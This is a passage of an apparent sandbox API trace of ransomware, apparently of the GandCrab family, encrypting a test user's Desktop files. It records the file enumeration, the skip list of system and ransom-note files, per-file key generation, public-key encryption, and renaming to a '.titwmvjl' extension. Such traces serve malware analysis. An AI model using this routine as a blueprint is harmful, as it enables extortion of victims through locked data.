lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\TITWMVJL-DECRYPT.txt" [0089.272] lstrlenW (lpString=".titwmvjl") returned 9 [0089.272] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\TITWMVJL-DECRYPT.txt") returned 71 [0089.272] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.272] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 80 [0089.272] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\TITWMVJL-DECRYPT.txt") returned 71 [0089.272] lstrlenW (lpString=".txt") returned 4 [0089.272] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.273] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0089.273] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0089.273] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\TITWMVJL-DECRYPT.txt") returned 71 [0089.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\TITWMVJL-DECRYPT.txt") returned 71 [0089.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0089.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0089.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0089.273] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.273] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.273] lstrcmpW (lpString1="ZztZ.avi", lpString2=".") returned 1 [0089.273] lstrcmpW (lpString1="ZztZ.avi", lpString2="..") returned 1 [0089.273] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\", lpString2="ZztZ.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi" [0089.273] lstrlenW (lpString=".titwmvjl") returned 9 [0089.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi") returned 59 [0089.273] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.273] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi.titwmvjl") returned 68 [0089.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi") returned 59 [0089.273] lstrlenW (lpString=".avi") returned 4 [0089.274] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.274] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0089.274] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0089.274] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi") returned 59 [0089.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi") returned 59 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="desktop.ini") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="autorun.inf") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="ntuser.dat") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="iconcache.db") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="bootsect.bak") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="boot.ini") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="ntuser.dat.log") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="thumbs.db") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="ntldr") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="NTDETECT.COM") returned 1 [0089.274] lstrcmpiW (lpString1="ZztZ.avi", lpString2="Bootfont.bin") returned 1 [0089.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi") returned 59 [0089.274] lstrlenW (lpString=".avi") returned 4 [0089.274] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.274] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0089.275] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.275] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.275] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vracl0_hrlfrctffeaio\\zztz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0089.275] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.275] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0089.276] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.276] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0089.277] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.278] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.278] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.278] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0089.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.278] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.278] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.278] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0089.279] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.280] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.280] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.280] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0089.280] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.280] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.280] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.280] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.280] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0089.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.282] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503638) returned 1 [0089.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.282] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0089.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.282] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0089.283] GetLastError () returned 0x0 [0089.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.283] CryptDestroyKey (hKey=0x503638) returned 1 [0089.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.283] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.283] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0089.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.284] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503238) returned 1 [0089.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.285] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0089.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.285] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0089.285] GetLastError () returned 0x0 [0089.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.285] CryptDestroyKey (hKey=0x503238) returned 1 [0089.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.285] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.285] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.286] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.286] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x12d97, lpOverlapped=0x0) returned 1 [0089.292] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffed269, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12d97, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x12d97, lpOverlapped=0x0) returned 1 [0089.294] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0089.295] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.298] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.299] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.299] CloseHandle (hObject=0x2b4) returned 1 [0089.300] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vracl0_hrlfrctffeaio\\zztz.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\ZztZ.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vracl0_hrlfrctffeaio\\zztz.avi.titwmvjl"), dwFlags=0x1) returned 1 [0089.300] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.300] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0089.300] FindClose (in: hFindFile=0x5037f8 | out: hFindFile=0x5037f8) returned 1 [0089.301] CloseHandle (hObject=0x2ac) returned 1 [0089.301] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.301] lstrcmpW (lpString1="xF SpMo9nNE7h.doc", lpString2=".") returned 1 [0089.301] lstrcmpW (lpString1="xF SpMo9nNE7h.doc", lpString2="..") returned 1 [0089.301] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="xF SpMo9nNE7h.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc" [0089.301] lstrlenW (lpString=".titwmvjl") returned 9 [0089.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc") returned 47 [0089.301] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.301] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc.titwmvjl") returned 56 [0089.302] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc") returned 47 [0089.302] lstrlenW (lpString=".doc") returned 4 [0089.302] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.302] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".doc ") returned 5 [0089.302] lstrcmpiW (lpString1=".doc", lpString2=".titwmvjl") returned -1 [0089.302] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.302] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc") returned 47 [0089.302] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc") returned 47 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="desktop.ini") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="autorun.inf") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="ntuser.dat") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="iconcache.db") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="bootsect.bak") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="boot.ini") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="ntuser.dat.log") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="thumbs.db") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="KRAB-DECRYPT.html") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="CRAB-DECRYPT.html") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="ntldr") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="NTDETECT.COM") returned 1 [0089.302] lstrcmpiW (lpString1="xF SpMo9nNE7h.doc", lpString2="Bootfont.bin") returned 1 [0089.302] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc") returned 47 [0089.302] lstrlenW (lpString=".doc") returned 4 [0089.302] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.303] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".doc ") returned 5 [0089.303] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.303] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.303] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xf spmo9nne7h.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.303] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.303] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.304] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.304] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.305] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.305] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.306] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.306] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.306] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.306] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.306] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.307] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.307] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.307] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.307] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.308] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.308] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.308] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.309] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503338) returned 1 [0089.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.310] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.310] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.310] GetLastError () returned 0x0 [0089.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.310] CryptDestroyKey (hKey=0x503338) returned 1 [0089.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.311] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.311] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.312] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0089.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.312] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.312] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.312] GetLastError () returned 0x0 [0089.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.313] CryptDestroyKey (hKey=0x503578) returned 1 [0089.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.313] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.313] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.313] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.313] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x17d1b, lpOverlapped=0x0) returned 1 [0089.326] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffe82e5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.326] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17d1b, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x17d1b, lpOverlapped=0x0) returned 1 [0089.328] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.330] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.333] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.334] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.334] CloseHandle (hObject=0x2ac) returned 1 [0089.334] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xf spmo9nne7h.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xF SpMo9nNE7h.doc.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xf spmo9nne7h.doc.titwmvjl"), dwFlags=0x1) returned 1 [0089.335] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.335] FindNextFileW (in: hFindFile=0x5034f8, 